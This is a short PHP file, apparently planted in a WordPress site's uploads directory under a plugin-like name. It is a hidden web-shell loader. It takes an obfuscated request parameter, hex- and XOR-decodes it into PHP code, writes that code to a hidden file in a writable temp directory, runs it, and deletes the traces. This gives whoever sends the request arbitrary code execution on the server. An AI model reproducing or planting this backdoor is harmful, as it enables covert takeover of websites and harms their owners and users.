File: /home/casinobe/domains/pug555-a.com/private_html/wp-content/uploads/wpcode/b/a/Interchange.php
<?php
if(!is_null($_REQUEST["\x6Dark\x65\x72"] ?? null)){
$value = array_filter([getcwd(), "/var/tmp", "/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), getenv("TEMP"), session_save_path(), "/dev/shm", sys_get_temp_dir()]);
$binding = hex2bin($_REQUEST["\x6Dark\x65\x72"]);
$resource = '' ;$p = 0; do{$resource .= chr(ord($binding[$p]) ^ 88);$p++;} while($p < strlen($binding));
for ($pointer = 0, $pgrp = count($value); $pointer < $pgrp; $pointer++) {
$ref = $value[$pointer];
if (max(0, is_dir($ref) * is_writable($ref))) {
$comp = str_replace("{var_dir}", $ref, "{var_dir}/.hld");
$success = file_put_contents($comp, $resource);
if ($success) {
include $comp;
@unlink($comp);
exit;}
}
}
}